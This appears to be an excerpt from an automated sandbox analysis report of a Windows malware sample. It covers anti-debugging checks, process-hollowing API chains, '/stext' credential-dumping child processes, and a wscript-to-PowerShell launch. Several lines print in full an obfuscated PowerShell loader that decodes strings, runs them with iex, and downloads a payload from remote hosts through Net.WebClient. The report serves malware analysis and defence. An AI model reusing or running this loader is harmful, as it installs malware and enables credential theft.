                      Source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP:
                      Source: wscript.exe, 00000003.00000003.2181694911.00000000034BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DlpAppEnlightenmentSettingsDiskHyper-V Gues
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2169570412.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2170134516.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4549696326.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2150851804.00000000007A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: bhvF6CA.tmp.4.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: wscript.exe, 00000003.00000002.2190906422.0000000005D0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2167955267.0000000005D0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2167892125.0000000005D0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_0-55100
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004349F9
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004432B5 mov eax, dword ptr fs:[00000030h]0_2_004432B5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_10004AB4 mov eax, dword ptr fs:[00000030h]0_2_10004AB4
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,0_2_00411CFE
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004349F9
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00434B47 SetUnhandledExceptionFilter,0_2_00434B47
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB22
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00434FDC
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100060E2
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002639
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002B1C

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi32_2064.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5644, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,0_2_004180EF
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: NULL target: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: NULL target: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: NULL target: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_004120F7
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00419627 mouse_event,0_2_00419627
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl"Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\kpjewkzmtipqfrcbhk"Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\mroxxckghqhciyqfqvohn"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. 